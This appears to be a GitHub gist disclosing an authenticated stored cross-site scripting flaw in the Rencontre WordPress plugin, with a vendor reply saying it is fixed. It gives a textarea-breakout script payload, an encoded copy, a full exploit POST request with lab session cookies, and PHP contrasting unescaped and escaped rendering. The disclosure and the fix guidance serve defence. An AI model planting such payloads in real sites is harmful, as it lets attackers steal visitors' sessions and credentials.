@sathishshan
Created August 14, 2019 04:03
# Exploit Title: Rencontre Wordpress plugin - Authenticated Stored XSS
# Date: 03/08/2019
# Exploit Author: Sathishshan
# Version: <= 3.1.3
# Vendor Homepage: Rencontre
# Software Link: https://wordpress.org/plugins/rencontre/
# Tested on: Ubuntu-server 18.0.* OS
# Category : Webapps
# Description
An authenticated persistent cross-site scripting vulnerability has been found in the web interface of the plugin. A value saved in the plugin's settings is reflected back unescaped, so arbitrary HTML/script code is executed in the victim's browser when they visit the affected page.
# Reproduction Steps:
1. Log in to WordPress and go to the plugin's settings page
2. Under "Framework for the Facebook Like button" there is a text area
3. Enter/paste the payload and save
# POC:
Parameter: facebook
Payload: </textarea></td><script>alert('XSS')</script>//
Encoded-Payload: %3C%2Ftextarea%3E%3C%2Ftd%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%2F%2F
# Exploit Request:
POST /wp-admin/admin.php?page=rencontre.php HTTP/1.1
Host: 192.168.144.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.144.128/wp-admin/admin.php?page=rencontre.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
Connection: close
Cookie: wordpress_bcee6f2sd387088d5ea973ea693516cd69e=admin%7C1564998379d%7CWy0iShin5dUwq9YOnrQqBUZ4Ul3XESucFBByPmUEdIF%7C05e93f0c17987198aaebc4dfbf797d1f74eeda8f08f61fd82026e207c6325b7ccf; PHPSESSID=nce78i7qvm2g4d63sddgar2n68rc; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bcee6f2387088d5e973ea693516cd69e=admin%7C1564998379%7CWy0iShin5dUwq9YOnrQqBUZ4Ul3XESucFBByPmUEdIF%7C84170a324458679871685b28dcb147a2e88fdsaae850eb6c5d8bb2ecc1636a894005; wp-settings-1=editor%3Dtinymce%26hidetb%3D0%26mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1564825233
Upgrade-Insecure-Requests: 1
home=http%3A%2F%2F192.168.144.128%2Findex.php%2Fsample-page%2F&pays=AL&prison=8&avatar=1&msgdel=4&dead=1&hcron=1&facebook=%3C%2Ftextarea%3E%3C%2Ftd%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%2F%2F%3C%2Ftextarea%3E%3C%2Ftd%3E
# Impact:
An attacker can execute malicious code in a victim's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data amongst others.
# Remediation:
Uninstall the plugin until the vulnerability has been fixed by the developer.
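The payload above works because the stored value is written back into the settings form without escaping: the leading `</textarea></td>` closes the element the plugin opened, and the following `<script>` is then parsed as live markup. The following PHP is an added example written for this page, not the Rencontre plugin's own code, showing the unsafe rendering next to the form a plugin developer would use in WordPress (`esc_textarea()`), plus a small check that flags a breakout in rendered output. The option name `facebook` and the stored value are taken from the advisory; the rendering functions and the `esc_textarea()` shim (only used when WordPress is not loaded) are assumptions for the example.

```php
<?php
// Added example, not the plugin's code. When run outside WordPress, esc_textarea()
// is shimmed with the same htmlspecialchars() call WordPress itself uses.
if (!function_exists('esc_textarea')) {
    function esc_textarea($text)
    {
        return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
    }
}

// Constructed input: the advisory's payload as it would sit in the saved option.
$stored = "</textarea></td><script>alert('XSS')</script>//";

// Vulnerable rendering: the option value is interpolated raw, so a </textarea>
// inside the value terminates the element and anything after it becomes markup.
function render_vulnerable(string $value): string
{
    return '<td><textarea name="facebook">' . $value . '</textarea></td>';
}

// Hardened rendering: esc_textarea() turns < > " ' & into entities, so the
// browser displays the text inside the textarea instead of parsing it as tags.
function render_hardened(string $value): string
{
    return '<td><textarea name="facebook">' . esc_textarea($value) . '</textarea></td>';
}

// Check a reviewer can run over rendered admin pages: the template emits exactly
// one closing </textarea>; a second one means a stored value broke out of it.
function textarea_breakout(string $html): bool
{
    return substr_count(strtolower($html), '</textarea>') > 1;
}

echo render_vulnerable($stored), PHP_EOL;
echo render_hardened($stored), PHP_EOL;
var_dump(textarea_breakout(render_vulnerable($stored)));
var_dump(textarea_breakout(render_hardened($stored)));
```

Escaping on output is the fix that matters here, since it protects every stored value regardless of how it got into the database; sanitising on save (for example via a `sanitize_callback` on `register_setting()`) is a useful second layer but not a substitute, because a value that reaches the option through another path would still be rendered unescaped.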
@boiteasite

Hi,
This is now fixed. Textarea has been removed.
Regards
